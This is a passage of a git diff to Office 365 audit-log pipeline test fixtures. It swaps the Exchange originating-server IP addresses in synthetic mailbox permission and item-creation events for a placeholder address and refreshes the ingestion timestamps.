FreeBusyDetailed\",\"MemberSid\":\"S-1-8-1750167797-1192043064-2586004354-3182407426-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (15.20.207.31)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:22\",\"ExternalAccess\":true,\"Id\":\"25ccad93-82ad-4742-5231-08d7b386d7e6\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-1750167797-1192043064-2586004354-3182407426-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "ClientIP": "::1", @@ -242,7 +242,7 @@ "Operation": "ModifyFolderPermissions", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "DB7PR01MB4428 (15.20.207.31)\n", + "OriginatingServer": "DB7PR01MB4428 (67.43.156.13)\n", "RecordType": 2, "ResultStatus": "Succeeded", "UserId": "S-1-5-18", @@ -254,7 +254,7 @@ }, { "event": { - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:41\",\"ExternalAccess\":true,\"Id\":\"edb9bb1f-9629-43a1-0a57-08d7b386e31c\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-2005823449-1144108501-1529089953-3087822558-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (15.20.225.32)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:41\",\"ExternalAccess\":true,\"Id\":\"edb9bb1f-9629-43a1-0a57-08d7b386e31c\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-2005823449-1144108501-1529089953-3087822558-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "ClientIP": "::1", @@ -284,7 +284,7 @@ "Operation": "ModifyFolderPermissions", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "DB3PR0102MB3500 (15.20.225.32)\n", + "OriginatingServer": "DB3PR0102MB3500 (67.43.156.13)\n", "RecordType": 2, "ResultStatus": "Succeeded", "UserId": "S-1-5-18", @@ -296,7 +296,7 @@ }, { "event": { - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"df63d186-b4d9-49a8-748c-08d7b3cc81fb\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-640184314-1174341437-2555636127-1766693009-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (15.20.225.32)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"df63d186-b4d9-49a8-748c-08d7b3cc81fb\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-640184314-1174341437-2555636127-1766693009-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "ClientIP": "::1", @@ -326,7 +326,7 @@ "Operation": "ModifyFolderPermissions", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "AM6PR01MB4535 (15.20.225.32)\n", + "OriginatingServer": "AM6PR01MB4535 (67.43.156.13)\n", "RecordType": 2, "ResultStatus": "Succeeded", "UserId": "S-1-5-18", @@ -338,7 +338,7 @@ }, { "event": { - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"284dfe85-ab53-48ad-0863-08d7b3cc81f7\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-640184314-1174341437-2555636127-1766693009-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (15.20.225.32)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"284dfe85-ab53-48ad-0863-08d7b3cc81f7\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-640184314-1174341437-2555636127-1766693009-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "ClientIP": "::1", @@ -368,7 +368,7 @@ "Operation": "ModifyFolderPermissions", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "AM6PR01MB4535 (15.20.225.32)\n", + "OriginatingServer": "AM6PR01MB4535 (67.43.156.13)\n", "RecordType": 2, "ResultStatus": "Succeeded", "UserId": "S-1-5-18", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-item-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-item-events.json-expected.json index c815879b311..563eacc3772 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-item-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-item-events.json-expected.json @@ -2,12 +2,12 @@ "expected": [ { "server": { - "address": "15.20.225.32", + "address": "67.43.156.13", "domain": "AM6PR01MB4535", - "ip": "15.20.225.32" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.225.32" + "ip": "67.43.156.13" }, "source": { "ip": "::1" @@ -56,7 +56,7 @@ "related": { "ip": [ "::1", - "15.20.225.32" + "67.43.156.13" ] }, "organization": { @@ -72,8 +72,8 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-17T07:32:53.695625Z", - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (599b); warming_email_03_2017_conversation.png (614b); warming_email_03_2017_links.png (1403b); google_play_store_badge.png (4824b); apple_store_badge.png (4446b); windows_store_badge.png (3681b); warming_email_03_2017_files.png (809b); warming_email_03_2017_sharePoint.png (1432b)\",\"Id\":\"RgAAAACklF6sEsJgSK/ulVd531/WBwCzgXIUnq3lQqXFeCmxHwmHAAAAAAEMAACzgXIUnq3lQqXFeCmxHwmHAAAAABULAAAJ\",\"InternetMessageId\":\"\\u003cAM6PR01MB4535D305187FEC8127CF8EDFEE160@AM6PR01MB4535.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new SIEMTest group is ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (15.20.225.32)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:42.659926900Z", + "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (599b); warming_email_03_2017_conversation.png (614b); warming_email_03_2017_links.png (1403b); google_play_store_badge.png (4824b); apple_store_badge.png (4446b); windows_store_badge.png (3681b); warming_email_03_2017_files.png (809b); warming_email_03_2017_sharePoint.png (1432b)\",\"Id\":\"RgAAAACklF6sEsJgSK/ulVd531/WBwCzgXIUnq3lQqXFeCmxHwmHAAAAAAEMAACzgXIUnq3lQqXFeCmxHwmHAAAAABULAAAJ\",\"InternetMessageId\":\"\\u003cAM6PR01MB4535D305187FEC8127CF8EDFEE160@AM6PR01MB4535.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new SIEMTest group is ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", "kind": "event", @@ -94,12 +94,12 @@ }, { "server": { - "address": "15.20.225.32", + "address": "67.43.156.13", "domain": "DB3PR0102MB3500", - "ip": "15.20.225.32" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.225.32" + "ip": "67.43.156.13" }, "source": { "ip": "::1" @@ -148,7 +148,7 @@ "related": { "ip": [ "::1", - "15.20.225.32" + "67.43.156.13" ] }, "organization": { @@ -164,8 +164,8 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-17T07:32:53.695632800Z", - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:46\",\"ExternalAccess\":true,\"Id\":\"c0790552-9989-4e91-cba4-08d7b386e642\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (598b); warming_email_03_2017_conversation.png (613b); warming_email_03_2017_links.png (1402b); google_play_store_badge.png (4823b); apple_store_badge.png (4445b); windows_store_badge.png (3680b); warming_email_03_2017_files.png (808b); warming_email_03_2017_sharePoint.png (1431b)\",\"Id\":\"RgAAAABQ7FIOAzxlR4hKCRQRbTbvBwBTdQb34omtRrZGvP+4ONQkAAAAAAEMAABTdQb34omtRrZGvP+4ONQkAAAAAA0lAAAJ\",\"InternetMessageId\":\"\\u003cDB3PR0102MB35003D203E5553CBC1B8AAEAE2160@DB3PR0102MB3500.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new All Company group is ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (15.20.225.32)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:42.659935500Z", + "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:46\",\"ExternalAccess\":true,\"Id\":\"c0790552-9989-4e91-cba4-08d7b386e642\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (598b); warming_email_03_2017_conversation.png (613b); warming_email_03_2017_links.png (1402b); google_play_store_badge.png (4823b); apple_store_badge.png (4445b); windows_store_badge.png (3680b); warming_email_03_2017_files.png (808b); warming_email_03_2017_sharePoint.png (1431b)\",\"Id\":\"RgAAAABQ7FIOAzxlR4hKCRQRbTbvBwBTdQb34omtRrZGvP+4ONQkAAAAAAEMAABTdQb34omtRrZGvP+4ONQkAAAAAA0lAAAJ\",\"InternetMessageId\":\"\\u003cDB3PR0102MB35003D203E5553CBC1B8AAEAE2160@DB3PR0102MB3500.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new All Company group is ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", "kind": "event", @@ -186,12 +186,12 @@ }, { "server": { - "address": "15.20.207.31", + "address": "67.43.156.13", "domain": "DB7PR01MB4428", - "ip": "15.20.207.31" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.31" + "ip": "67.43.156.13" }, "source": { "ip": "::1" @@ -240,7 +240,7 @@ "related": { "ip": [ "::1", - "15.20.207.31" + "67.43.156.13" ] }, "organization": { @@ -256,8 +256,8 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-17T07:32:53.695635200Z", - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:31\",\"ExternalAccess\":true,\"Id\":\"c6b58ed7-a54a-47cf-a301-08d7b386dd7c\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (598b); warming_email_03_2017_conversation.png (613b); warming_email_03_2017_links.png (1402b); google_play_store_badge.png (4823b); apple_store_badge.png (4445b); windows_store_badge.png (3680b); warming_email_03_2017_files.png (808b); warming_email_03_2017_sharePoint.png (1431b)\",\"Id\":\"RgAAAABkkJvTy6NaRYV8EL+vMtzZBwAk6unHVumCRJNhRrAMRwYLAAAAAAEMAAAk6unHVumCRJNhRrAMRwYLAAAAAAk9AAAJ\",\"InternetMessageId\":\"\\u003cDB7PR01MB442884FC2132AE2A909799BAFC160@DB7PR01MB4428.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new All Company group is ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (15.20.207.31)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:42.659941200Z", + "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:31\",\"ExternalAccess\":true,\"Id\":\"c6b58ed7-a54a-47cf-a301-08d7b386dd7c\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (598b); warming_email_03_2017_conversation.png (613b); warming_email_03_2017_links.png (1402b); google_play_store_badge.png (4823b); apple_store_badge.png (4445b); windows_store_badge.png (3680b); warming_email_03_2017_files.png (808b); warming_email_03_2017_sharePoint.png (1431b)\",\"Id\":\"RgAAAABkkJvTy6NaRYV8EL+vMtzZBwAk6unHVumCRJNhRrAMRwYLAAAAAAEMAAAk6unHVumCRJNhRrAMRwYLAAAAAAk9AAAJ\",\"InternetMessageId\":\"\\u003cDB7PR01MB442884FC2132AE2A909799BAFC160@DB7PR01MB4428.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new All Company group is 